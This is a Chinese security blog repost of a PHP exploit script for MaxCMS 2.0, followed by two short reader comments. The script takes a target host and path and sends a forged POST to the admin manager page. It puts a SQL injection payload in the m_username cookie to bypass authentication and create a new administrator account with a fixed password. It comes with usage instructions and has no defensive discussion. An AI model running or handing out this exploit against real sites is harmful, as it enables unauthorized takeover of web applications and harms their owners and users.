首页 > 网络安全 > MaxCMS 2.0 (m_username) Arbitrary Create Admin Exp

MaxCMS 2.0 (m_username) Arbitrary Create Admin Exp

复制内容到剪贴板程序代码程序代码
<?php
print_r('
+—————————————————————————+
maxcms2.0 creat new admin exploit
by Securitylab.ir
+—————————————————————————+
');

if ($argc < 3) {
    print_r('
+—————————————————————————+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to maxcms
Example:
php '.$argv[0].' localhost /maxcms2/
+—————————————————————————+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$name = rand(1,10000);
$cmd = 'm_username=securitylab'.$name.'&m_pwd=securitylab&m_pwd2=securitylab&m_level=0';

$resp = send($cmd);
if (!eregi('alert',$resp)) {echo"[~]bad!,exploit failed";exit;}

print_r('
+—————————————————————————+
[+]cool,exploit seccuss
[+]you have add a new adminuser securitylab'.$name.'/securitylab
+—————————————————————————+
');

function send($cmd)
{
    global $host, $path;
    $message = "POST ".$path."admin/admin_manager.asp?action=add HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: http://$host$path\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: securitylab\r\n";
    $message .= "X-Forwarded-For:1.1.1.1\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Content-Length: ".strlen($cmd)."\r\n";
    $message .= "Cookie: m_username=securitylab'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin; m_level=0; checksecuritylab'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin=cf144fd7a325d1088456838f524ae9d7\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $cmd;
    echo $message;

    $fp = fsockopen($host, 80);
    fputs($fp, $message);

    $resp = '';

    while ($fp && !feof($fp))
    $resp .= fread($fp, 1024);
    echo $resp;
    return $resp;
}
?>

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/215

  1. 0point
    0point 5月 21st, 2009 @ 16:32 | #-31

    由于本人的机器没有php环境因此没有实际测试,本文源代码出自miw0rm。

  2. weite
    weite 5月 21st, 2009 @ 15:41 | #-32

    接收的m_username变量过滤不严,这个有利用成功过吗?

评论提交中, 请稍候...

留言



注意: 您给他人的评论回复将通过邮件通知到对方。

可以使用的标签: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>
Trackbacks & Pingbacks ( 0 )
  1. 还没有 trackbacks